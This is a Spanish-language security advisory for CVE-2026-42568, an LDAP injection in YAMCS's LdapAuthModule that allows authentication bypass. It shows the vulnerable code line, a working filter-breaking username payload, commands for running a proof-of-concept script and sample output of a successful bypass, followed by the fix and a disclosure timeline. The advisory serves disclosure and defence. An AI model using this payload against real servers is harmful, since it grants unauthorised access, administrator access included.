
Existe una vulnerabilidad de inyección LDAP en org.yamcs.security.LdapAuthModule. El parámetro username se inserta directamente en los filtros de búsqueda LDAP sin escape RFC 4515, permitiendo la evasión de autenticación.
Existe una vulnerabilidad de inyección LDAP en org.yamcs.security.LdapAuthModule. El parámetro de nombre de usuario se inserta directamente en los filtros de búsqueda LDAP sin escape según RFC 4515, lo que permite omitir la autenticación.
| Campo | Valor |
|---|
| CVE | CVE-2026-42568 |
| Gravedad | MEDIA |
| CWE | CWE-90: Neutralización incorrecta de elementos especiales en consultas LDAP |
| Afectado | yamcs-core < 5.12.7 (con autenticación LDAP configurada) |
| Corregido en | yamcs-core 5.12.7 |
| Aviso | GHSA-cqh3-jg8p-336j |
Causa raíz (LdapAuthModule.java):
var filter = userFilter.replace("{0}", username);
// username inserted directly — no RFC 4515 escaping
Con un userFilter típico de (uid={0}), un nombre de usuario malicioso rompe la estructura del filtro:
Entrada: *)(uid=*))(|(uid=*
Filtro: (uid=*)(uid=*))(|(uid=*)
Resultado: Coincidencia universal — autenticación omitida
pip install requests
python3 poc.py http://localhost:8090
Salida esperada en una instancia vulnerable (con LDAP configurado):
[1] Bypass universal (cualquier cuenta)
Usuario: *)(uid=*))(|(uid=*
Contraseña: cualquier cosa
Resultado: HTTP 200
[!!!] AUTENTICACIÓN OMITIDA
[!!!] Token recibido: eyJhbGciOiJSUzI1NiJ9...
Nota: Esta vulnerabilidad solo afecta a instancias de YAMCS con
LdapAuthModuleconfigurado. Las instalaciones predeterminadas que usan autenticación integrada no se ven afectadas.
Un atacante no autenticado que pueda alcanzar el servidor YAMCS puede omitir completamente la autenticación cuando LDAP está configurado, obteniendo acceso como cualquier usuario, incluidos los administradores.
Actualizar a yamcs-core >= 5.12.7.
La corrección aplica escape RFC 4515 al nombre de usuario antes de construir el filtro LDAP.
| Fecha | Evento |
|---|---|
| 2026-05 | Vulnerabilidad reportada |
| 2026-05-26 | Corrección publicada en yamcs-core 5.12.7 |
| 2026-05-26 | Aviso público publicado |
Daniel Miranda Barcelona (Excal1bur)